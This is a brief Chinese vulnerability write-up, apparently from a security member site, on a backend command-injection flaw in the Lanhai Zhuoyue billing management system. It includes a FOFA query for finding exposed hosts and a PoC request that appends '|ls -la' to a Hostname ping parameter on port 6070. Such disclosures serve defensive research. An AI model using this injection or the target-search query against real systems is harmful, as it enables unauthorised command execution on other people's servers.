蓝海卓越计费管理系统后台RCE-棉花糖会员站

# 蓝海卓越计费管理系统后台RCE

## 漏洞描述

蓝海卓越计费管理系统后台存在RCE，可进行命令执行

## 漏洞影响

> 蓝海卓越计费管理系统

## FOFA

> app=”蓝海卓越计费管理系统”

## 漏洞复现

漏洞存在点很简单，就是没有对输入的过滤

![img](/static/qingy/蓝海卓越计费管理系统后台RCE/img/wps0llP5L.jpg)

执行拼接代码执行，这里有个点需要注意以下，就是接口不能存在，才能进行拼接，当接口不存在的时候，接口调用为空，则后面可以进行拼接

![img](/static/qingy/蓝海卓越计费管理系统后台RCE/img/wpsBqYrXl.jpg)

无任何其他的过滤操作

![img](/static/qingy/蓝海卓越计费管理系统后台RCE/img/wpsW8ZSaQ.jpg)

##poc

端口一般开在6070

“`
Hostname=114.114.114.114|ls -la&physicalInterface=1&pingCount=1
“`

![image-20210707132710239](/static/qingy/蓝海卓越计费管理系统后台RCE/img/image-20210707132710239.png)

![image-20210707132803888](/static/qingy/蓝海卓越计费管理系统后台RCE/img/image-20210707132803888.png)

文章版权归作者所有，未经允许请勿转载。

THE END

蓝海卓越计费管理系统后台RCE